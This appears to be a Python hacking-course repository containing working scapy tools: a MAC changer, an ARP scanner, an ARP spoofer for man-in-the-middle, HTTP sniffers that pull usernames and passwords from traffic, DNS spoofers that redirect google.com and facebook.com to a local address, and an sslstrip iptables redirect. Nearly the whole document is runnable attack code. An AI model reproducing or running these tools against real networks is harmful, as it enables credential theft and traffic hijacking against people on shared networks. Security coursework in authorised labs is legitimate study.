├── .gitignore ├── README.md ├── requirements.txt ├── 06 -https_bypassing └── read.txt ├── 04-packet_sniffer ├── sniffer.py └── sniffer_2.py ├── 02-net_scan └── net_scan.py ├── 05-dns_spoof ├── dns_spoofer.py └── dns_spoof_bis.py ├── 01-mac_changer └── mac_changer.py └── 03-arp_spoof └── arp_spoof.py /.gitignore: -------------------------------------------------------------------------------- 1 | .vscode 2 | venv*/ 3 | env*/ -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # hackingPythonModule 2 | Todo 3 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | ipdb 2 | scapy==2.4.3 3 | https://github.com/B0rjitaaa/hackingPythonModule.git -------------------------------------------------------------------------------- /06 -https_bypassing/read.txt: -------------------------------------------------------------------------------- 1 | sslstrip 2 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 3 | 4 | http://sic.us.es/servicios/correo-electronico/correo-electronico -------------------------------------------------------------------------------- /04-packet_sniffer/sniffer.py: -------------------------------------------------------------------------------- 1 | # Only HTTP 2 | # Python2 3 | 4 | import scapy.all as scapy 5 | from scapy.layers import http 6 | 7 | 8 | def sniff(interface): 9 | scapy.sniff( 10 | iface=interface, 11 | store=False, 12 | prn=process_sniffed_packet # Callback function 13 | ) 14 | 15 | 16 | def get_url(packet): 17 | 18 | return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path 19 | 20 | 21 | def get_login_info(packet): 22 | if packet.haslayer(scapy.Raw): 23 | load = packet[scapy.Raw].load 24 | keywords = ['username', 'user', 'login', 'mail', 'email', 'usuario', 'clave', 'password', 'pass', 'edit-name', 'edit-pass'] 25 | 26 | if [keyword for keyword in keywords if keyword in load]: 27 | return load 28 | 29 | 30 | def process_sniffed_packet(packet): 31 | if packet.haslayer(http.HTTPRequest): 32 | url = get_url(packet) 33 | print('[+] HTTP Request >> ' + url.decode("utf-8")) 34 | 35 | loggin_info = get_login_info(packet) 36 | if loggin_info: 37 | print('\n\n[+] Possible username/password > ' + loggin_info + '\n\n') 38 | 39 | sniff("wlan0") 40 | 41 | 42 | # Webs for testing purposes: 43 | # http://iberianodonataucm.myspecies.info/ 44 | # http://diptera.myspecies.info/ 45 | # http://scratchpads.eu/explore/sites-list 46 | -------------------------------------------------------------------------------- /02-net_scan/net_scan.py: -------------------------------------------------------------------------------- 1 | from scapy.all import ARP, Ether, srp 2 | import optparse 3 | import os 4 | 5 | 6 | def check_super_user(): 7 | return os.geteuid() == 0 8 | 9 | 10 | def get_arguments(): 11 | parser = optparse.OptionParser() 12 | parser.add_option("-t", "--target", dest="target", help="Target IP / IP range.") 13 | (options, arguments) = parser.parse_args() 14 | return options 15 | 16 | 17 | def scan(ip): 18 | arp_request = ARP(pdst=ip) 19 | broadcast = Ether(dst="ff:ff:ff:ff:ff:ff") 20 | arp_request_broadcast = broadcast/arp_request 21 | result = srp(arp_request_broadcast, timeout=3, verbose=False)[0] # Get only the answered ones. 22 | 23 | clients= [] 24 | for sent, received in result: 25 | clients.append({'ip': received.psrc, 'mac': received.hwsrc}) 26 | return clients 27 | 28 | 29 | def print_result(results_list): 30 | print("IP\t\t\tMAC Address\n-----------------------------------------") 31 | for client in results_list: 32 | print("{} \t\t {}".format(client["ip"], client["mac"])) 33 | 34 | 35 | if __name__ == '__main__': 36 | if check_super_user(): 37 | options = get_arguments() 38 | scan_result = scan(options.target) 39 | print_result(scan_result) 40 | else: 41 | print('[!] Access denied. Please SUDO!') 42 | 43 | 44 | # python3 net_scan.py -t 192.168.0.1/24 45 | -------------------------------------------------------------------------------- /04-packet_sniffer/sniffer_2.py: -------------------------------------------------------------------------------- 1 | # Only HTTP 2 | # Python2 3 | 4 | from scapy import all as scapy # packet capture module 5 | from scapy.layers import http # supplementing scapy module by providing http filter 6 | from urllib.parse import unquote # to make url encoded text into string 7 | 8 | 9 | # keywords guessing the variable use for username and password 10 | keywords = ['username', 'user', 'login', 'mail', 'email', 'usuario', 'clave', 'password', 'pass', 'wpName', 'wpPassword'] 11 | 12 | 13 | class sniffing(): 14 | def __init__(self, interface, filter=""): 15 | self.sniffs(interface, filter) 16 | 17 | def processing_data(self, pkt): 18 | if pkt.haslayer(http.HTTPRequest): # look for http request 19 | print(pkt[http.HTTPRequest].Host + pkt[http.HTTPRequest].Path) # print the URL, the victim visits 20 | if pkt.haslayer(scapy.Raw): # username and password appears in raw field 21 | for keyword in keywords: # check if each keyword exists 22 | if keyword in str(pkt[scapy.Raw]): # in the raw field 23 | print(unquote(str(pkt[scapy.Raw]))) # if exists, print out the content once. 24 | break 25 | 26 | def sniffs(self, interface, filter): 27 | return scapy.sniff(iface=interface, store=False, prn=self.processing_data, filter=filter) 28 | 29 | test = sniffing(interface='wlan0') -------------------------------------------------------------------------------- /05-dns_spoof/dns_spoofer.py: -------------------------------------------------------------------------------- 1 | # iptables -A INPUT -p udp --sport 53 -j NFQUEUE --queue-num 1 2 | # iptables -I FORWARD -j NFQUEUE --queue-num 1 3 | # python 05-dns_spoof/dns_spoofer.py -w www.marca.com -i 192.168.0.35 4 | 5 | import netfilterqueue 6 | import scapy.all as scapy 7 | import argparse 8 | 9 | 10 | def get_arguments(): 11 | parser = argparse.ArgumentParser() 12 | parser.add_argument("-w", "--website", dest="website", 13 | help="Website url") 14 | parser.add_argument("-i", "--ip-address", dest="ip", 15 | help="Hacker IP address") 16 | options = parser.parse_args() 17 | return options 18 | 19 | 20 | def spoof_packet(packet): 21 | options = get_arguments() 22 | dns_packet = scapy.IP(packet.get_payload()) 23 | if dns_packet.haslayer(scapy.DNSRR): 24 | qname = dns_packet[scapy.DNSQR].qname 25 | if options.website in qname.decode("utf-8"): 26 | dns_responce = scapy.DNSRR(rrname=qname, rdata=options.ip) 27 | dns_packet[scapy.DNS].an = dns_responce 28 | dns_packet[scapy.DNS].ancount = 1 29 | 30 | del dns_packet[scapy.IP].len 31 | del dns_packet[scapy.IP].chksum 32 | del dns_packet[scapy.UDP].len 33 | del dns_packet[scapy.UDP].chksum 34 | 35 | # packet.set_payload(str(dns_packet)) 36 | packet.set_payload(bytes(dns_packet)) 37 | packet.accept() 38 | 39 | 40 | queue = netfilterqueue.NetfilterQueue() 41 | queue.bind(1, spoof_packet) 42 | queue.run() -------------------------------------------------------------------------------- /01-mac_changer/mac_changer.py: -------------------------------------------------------------------------------- 1 | # python3 2 | 3 | import subprocess 4 | import optparse 5 | import re 6 | import os 7 | 8 | 9 | def check_super_user(): 10 | return os.geteuid() == 0 11 | 12 | 13 | def get_current_mac(interface): 14 | ifconfig_result = subprocess.check_output(['ifconfig', interface]) 15 | mac_addr = re.search(r'\w\w:\w\w:\w\w:\w\w:\w\w:\w\w', str(ifconfig_result)) 16 | if mac_addr: 17 | return mac_addr.group(0) 18 | else: 19 | print('[!] Could not read MAC address.') 20 | 21 | 22 | def get_arguments(): 23 | parser = optparse.OptionParser() 24 | parser.add_option('-i', '--interface', dest='interface', help='Interface to change its MAC addr') 25 | parser.add_option('-m', '--mac', dest='new_mac', help='New MAC addr') 26 | (options, arguments) = parser.parse_args() 27 | if not options.interface: 28 | parser.error('[!] Please specify an interface, use --help for more info.') 29 | elif not options.new_mac: 30 | parser.error('[!] Please specify a MAC, use --help for more info.') 31 | return options 32 | 33 | 34 | def change_mac(interface, new_mac): 35 | print('[+] Changing MAC addres for {} to {}'.format(interface, new_mac)) 36 | subprocess.call(["ifconfig", interface, "hw", "ether", new_mac]) 37 | 38 | 39 | if __name__ == '__main__': 40 | if check_super_user(): 41 | options = get_arguments() 42 | current_mac = get_current_mac(options.interface) 43 | print('Current MAC: {}'.format(current_mac)) 44 | 45 | change_mac(options.interface, options.new_mac) 46 | 47 | if current_mac != options.new_mac: 48 | print('[+] MAC address was successfully changed to {}.'.format(options.new_mac)) 49 | else: 50 | print('[!] MAC address did not get changed.') 51 | else: 52 | print('[!] Access denied. Please SUDO!') 53 | -------------------------------------------------------------------------------- /03-arp_spoof/arp_spoof.py: -------------------------------------------------------------------------------- 1 | import scapy.all as scapy 2 | import optparse 3 | import time 4 | import os 5 | import sys 6 | 7 | 8 | IFACE = "wlan0" # eth0 linux 9 | 10 | 11 | def check_super_user(): 12 | return os.geteuid() == 0 13 | 14 | 15 | def get_arguments(): 16 | parser = optparse.OptionParser() 17 | parser.add_option("-t", "--target", dest="target", help="Target IP") 18 | parser.add_option("-r", "--gateway", dest="gateway", help="Gateway IP") 19 | (options, arguments) = parser.parse_args() 20 | if not options.target: 21 | parser.error('[!] Please specify a target, use --help for more info.') 22 | if not options.gateway: 23 | parser.error('[!] Please specify a gateway, use --help for more info.') 24 | return options 25 | 26 | 27 | def enable_forwarding(): 28 | if IFACE == 'wlan0': 29 | os.system('echo 1 > /proc/sys/net/ipv4/ip_forward') 30 | elif IFACE == 'en0': # OSX 31 | os.system("sysctl -w net.inet.ip.forwarding=1") 32 | 33 | 34 | def restore(destination_ip, source_ip): 35 | packet = scapy.ARP( 36 | op=2, # op == 2 -> because we only want to create a response, not also a request. 37 | pdst=destination_ip, 38 | hwdst=get_mac(destination_ip), 39 | psrc=source_ip, 40 | hwsrc=get_mac(source_ip) 41 | ) 42 | scapy.send(packet, count=4, verbose=False) 43 | 44 | 45 | def get_mac(ip): 46 | arp_request = scapy.ARP(pdst=ip) 47 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 48 | arp_request_broadcast = broadcast/arp_request 49 | answered = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] # Get only the answered ones. 50 | if answered: 51 | if answered[0][1].hwsrc: 52 | return answered[0][1].hwsrc 53 | else: 54 | return None 55 | 56 | 57 | def spoof(target_ip, spoof_ip): 58 | packet = scapy.ARP( 59 | op=2, # op == 2 -> because we only want to create a response, not also a request. 60 | pdst=target_ip, 61 | hwdst=get_mac(target_ip), 62 | psrc=spoof_ip 63 | ) 64 | scapy.send(packet, verbose=False) # Not output 65 | 66 | 67 | if __name__ == '__main__': 68 | if check_super_user(): 69 | sent_packets_count = 0 70 | enable_forwarding() 71 | target_ip, gateway = get_arguments().target, get_arguments().gateway 72 | if target_ip and gateway: 73 | try: 74 | while True: 75 | spoof(target_ip, gateway) 76 | spoof(gateway, target_ip) 77 | sent_packets_count += 2 78 | print("\r[-] Packets sent: {}".format(sent_packets_count), end="") 79 | time.sleep(2) 80 | except KeyboardInterrupt: 81 | print("\n[+] Detected CTRL + C ... Restoring") 82 | restore(target_ip, gateway) 83 | restore(gateway, target_ip) 84 | else: 85 | print('[!] Please add Target IP and/or Gateway.') 86 | else: 87 | print('[!] Access denied. Please SUDO!') -------------------------------------------------------------------------------- /05-dns_spoof/dns_spoof_bis.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from netfilterqueue import NetfilterQueue 3 | import os 4 | 5 | # DNS mapping records, feel free to add/modify this dictionary 6 | # for example, google.com will be redirected to 192.168.1.100 7 | dns_hosts = { 8 | b"www.google.com.": "192.168.0.35", 9 | b"www.facebook.com.": "192.168.0.35", 10 | b"www.marca.com.": "192.168.0.35", 11 | } 12 | 13 | def process_packet(packet): 14 | """ 15 | Whenever a new packet is redirected to the netfilter queue, 16 | this callback is called. 17 | """ 18 | # convert netfilter queue packet to scapy packet 19 | scapy_packet = IP(packet.get_payload()) 20 | if scapy_packet.haslayer(DNSRR): 21 | # if the packet is a DNS Resource Record (DNS reply) 22 | # modify the packet 23 | print("[Before]:", scapy_packet.summary()) 24 | try: 25 | scapy_packet = modify_packet(scapy_packet) 26 | except IndexError: 27 | # not UDP packet, this can be IPerror/UDPerror packets 28 | pass 29 | print("[After ]:", scapy_packet.summary()) 30 | # set back as netfilter queue packet 31 | packet.set_payload(bytes(scapy_packet)) 32 | # accept the packet 33 | packet.accept() 34 | 35 | 36 | def modify_packet(packet): 37 | """ 38 | Modifies the DNS Resource Record `packet` ( the answer part) 39 | to map our globally defined `dns_hosts` dictionary. 40 | For instance, whenever we see a google.com answer, this function replaces 41 | the real IP address (172.217.19.142) with fake IP address (192.168.1.30) 42 | """ 43 | # get the DNS question name, the domain name 44 | qname = packet[DNSQR].qname 45 | if qname not in dns_hosts: 46 | # if the website isn't in our record 47 | # we don't wanna modify that 48 | print("no modification:", qname) 49 | return packet 50 | # craft new answer, overriding the original 51 | # setting the rdata for the IP we want to redirect (spoofed) 52 | # for instance, google.com will be mapped to "192.168.1.100" 53 | packet[DNS].an = DNSRR(rrname=qname, rdata=dns_hosts[qname]) 54 | # set the answer count to 1 55 | packet[DNS].ancount = 1 56 | # delete checksums and length of packet, because we have modified the packet 57 | # new calculations are required ( scapy will do automatically ) 58 | del packet[IP].len 59 | del packet[IP].chksum 60 | del packet[UDP].len 61 | del packet[UDP].chksum 62 | # return the modified packet 63 | return packet 64 | 65 | QUEUE_NUM = 1 66 | # insert the iptables FORWARD rule 67 | os.system("iptables -A INPUT -p udp --sport 53 -j NFQUEUE --queue-num 1") 68 | os.system("iptables -I FORWARD -j NFQUEUE --queue-num {}".format(QUEUE_NUM)) 69 | # instantiate the netfilter queue 70 | queue = NetfilterQueue() 71 | 72 | try: 73 | # bind the queue number to our callback `process_packet` 74 | # and start it 75 | queue.bind(QUEUE_NUM, process_packet) 76 | queue.run() 77 | except KeyboardInterrupt: 78 | # if want to exit, make sure we 79 | # remove that rule we just inserted, going back to normal. 80 | os.system("iptables --flush") --------------------------------------------------------------------------------